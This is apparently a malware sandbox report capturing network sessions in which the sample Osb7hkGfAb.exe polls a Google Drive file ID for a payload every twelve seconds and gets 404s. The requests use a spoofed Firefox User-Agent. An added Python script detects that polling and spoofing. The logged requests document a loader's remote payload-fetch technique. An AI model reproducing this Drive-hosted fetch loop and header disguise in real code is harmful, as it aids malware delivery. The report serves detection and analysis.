                                                                        2025-01-10 15:03:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 65 72 61 6e 67 75 4d 48 6e 7a 65 75 39 54 67 57 6b 35 46 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QeranguMHnzeu9TgWk5FKQ">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
10          192.168.2.10  49983        142.250.184.238  443               2900  C:\Users\user\Desktop\Osb7hkGfAb.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 15:03:25 UTC  417                OUT        GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
2025-01-10 15:03:26 UTC  1920               IN         HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:25 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-DNWrFMwiDaP3iaouLls_Rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close
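
The sessions above show the loader's payload-retrieval loop: a GET to drive.google.com/uc?export=download&id=... is answered with a 303 to drive.usercontent.google.com/download, that fetch returns 404 (the hosted payload is gone), and the pair is repeated roughly every 12 seconds. The requests claim a Firefox 121 User-Agent but carry only Host, Cache-Control, Connection and Cookie, none of the Accept, Accept-Language or Accept-Encoding headers a real Firefox build sends. The script below is an added example, not part of the Joe Sandbox report: it takes a constructed summary of sessions 5 to 11 (timestamps, hosts, paths, status codes and redirect targets copied from the report, the NID cookie redacted) and flags the Drive file ID, the fixed-interval polling, the redirect chains that all end in 404, and the browser-UA/header mismatch. The repeat and jitter thresholds are assumptions.

```python
"""Detect the Google Drive payload-polling pattern captured in the sessions above.

Added example, not part of the Joe Sandbox report. Input is a constructed
summary of the report's sessions; thresholds are assumptions.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

DRIVE_ID_RE = re.compile(r"[?&]id=([A-Za-z0-9_-]{20,})")
BROWSER_UA_RE = re.compile(r"(Firefox|Chrome|Safari)/\d+")
# Headers every mainstream browser sends on a plain GET; a request that
# claims a browser UA but omits them was built by hand.
BROWSER_HEADERS = {"accept", "accept-language", "accept-encoding"}

UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
FILE_ID = "1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4"
UC_PATH = f"/uc?export=download&id={FILE_ID}"
DL_PATH = f"/download?id={FILE_ID}&export=download"
DL_URL = f"https://drive.usercontent.google.com{DL_PATH}"

# Request headers as seen in the report (cookie value redacted, constructed).
REQUEST_HEADERS = {"User-Agent": UA, "Cache-Control": "no-cache",
                   "Connection": "Keep-Alive", "Cookie": "NID=<redacted>"}

# Constructed summary of sessions 5-11:
# (session id, UTC timestamp, host, path, response status, Location header)
SESSIONS = [
    (5,  "2025-01-10 15:02:50", "drive.usercontent.google.com", DL_PATH, 404, None),
    (6,  "2025-01-10 15:03:01", "drive.google.com",             UC_PATH, 303, DL_URL),
    (7,  "2025-01-10 15:03:02", "drive.usercontent.google.com", DL_PATH, 404, None),
    (8,  "2025-01-10 15:03:13", "drive.google.com",             UC_PATH, 303, DL_URL),
    (9,  "2025-01-10 15:03:14", "drive.usercontent.google.com", DL_PATH, 404, None),
    (10, "2025-01-10 15:03:25", "drive.google.com",             UC_PATH, 303, DL_URL),
    (11, "2025-01-10 15:03:26", "drive.usercontent.google.com", DL_PATH, 404, None),
]


def drive_file_ids(sessions):
    """Extract every Google Drive file id requested across the sessions."""
    ids = set()
    for _, _, _, path, _, _ in sessions:
        m = DRIVE_ID_RE.search(path)
        if m:
            ids.add(m.group(1))
    return ids


def spoofed_browser_ua(headers):
    """True when the UA names a browser but the usual Accept* headers are absent."""
    ua = headers.get("User-Agent", "")
    present = {k.lower() for k in headers}
    return bool(BROWSER_UA_RE.search(ua)) and not BROWSER_HEADERS <= present


def polling_loops(sessions, min_requests=3, max_jitter_s=3.0):
    """Group requests by (host, path); flag targets re-fetched at a near-constant period."""
    by_target = defaultdict(list)
    for _, ts, host, path, status, _ in sessions:
        by_target[(host, path)].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), status))
    loops = {}
    for target, hits in by_target.items():
        if len(hits) < min_requests:
            continue
        hits.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
        period = statistics.median(gaps)
        if max(abs(g - period) for g in gaps) <= max_jitter_s:
            loops[target] = {"count": len(hits), "period_s": period,
                             "statuses": sorted({s for _, s in hits})}
    return loops


def redirect_chains(sessions):
    """Pair each 303 with the later session that fetched its Location target."""
    chains = []
    for i, (sid, _, _, _, status, location) in enumerate(sessions):
        if status != 303 or not location:
            continue
        for nsid, _, nhost, npath, nstatus, _ in sessions[i + 1:]:
            if location == f"https://{nhost}{npath}":
                chains.append((sid, nsid, nstatus))
                break
    return chains


def analyze(sessions, request_headers):
    """Return human-readable findings for the captured traffic."""
    findings = []
    if spoofed_browser_ua(request_headers):
        findings.append("browser User-Agent without Accept/Accept-Language/Accept-Encoding")
    for fid in sorted(drive_file_ids(sessions)):
        findings.append(f"Google Drive file id {fid} used as payload host")
    for (host, path), info in polling_loops(sessions).items():
        findings.append(f"{info['count']}x {host}{path.split('?')[0]} every "
                        f"~{info['period_s']:.0f}s, statuses {info['statuses']}")
    chains = redirect_chains(sessions)
    if chains and all(st == 404 for _, _, st in chains):
        findings.append(f"{len(chains)} Drive redirect chains all ended in 404: "
                        "payload removed, loader keeps retrying")
    return findings


if __name__ == "__main__":
    for line in analyze(SESSIONS, REQUEST_HEADERS):
        print("-", line)
```

The period check uses the median gap so one slow response does not hide the loop; on live proxy logs the same grouping by (host, path) over a sliding window catches the retry behaviour even when the hosted file has already been taken down, which is exactly the state this capture shows.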


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.10  49984        142.250.186.97  443               2900  C:\Users\user\Desktop\Osb7hkGfAb.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-10 15:03:26 UTC  459                OUT        GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
2025-01-10 15:03:27 UTC  1844               IN         HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFIdbgS2xczhJ-v2_mruyq0uC0XKLxAwBIKmg2iy1tupNpO1sZ0zakQZppXAHM_yVo5VcMIU
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:27 GMT
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-zweZO-bAP14EDPNFZg4AXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:03:27 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 36 79 67 4e 30 41 31 6c 6d 39 63 4d 44 41 36 6b 52 75 41 6b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="r6ygN0A1lm9cMDA6kRuAkw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.10 | 49985 | 142.250.184.238 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-01-10 15:03:37 UTC | 417 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:38 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:38 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-pJbGYd7KMFEgMCC8pQ2y3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.10 | 49986 | 142.250.186.97 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-01-10 15:03:39 UTC | 459 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:39 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFIdbgThTYRN7O3f64Kn6biZt94WfS5CnLvSWpPgzj3rLjRl85F-X8fgFs43wy06D-9ZXIizrEpAKtI
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:39 GMT
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: script-src 'nonce-AYcaci9eFvP0LcMVswPi7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:03:39 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 4e 30 4e 72 6a 33 6a 42 41 59 4f 6d 68 43 57 32 4c 34 65 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lN0Nrj3jBAYOmhCW2L4eTw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.10 | 49987 | 142.250.184.238 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-01-10 15:03:50 UTC | 417 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:50 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:50 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-zUMllxRrhrU5nNU0UsZ3TA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.10 | 49988 | 142.250.186.97 | 443 | 2900 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-01-10 15:03:51 UTC | 459 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:51 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFiumC5nIunltLmQZYqr8neEQ0YE_O6jOubGEhCqfTIC5mlahuNHO9ljCvxc_mYE7BoBJ8Vwv7HEKXE
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:51 GMT
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-5_tmSxbga8swmxmDa0vFsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
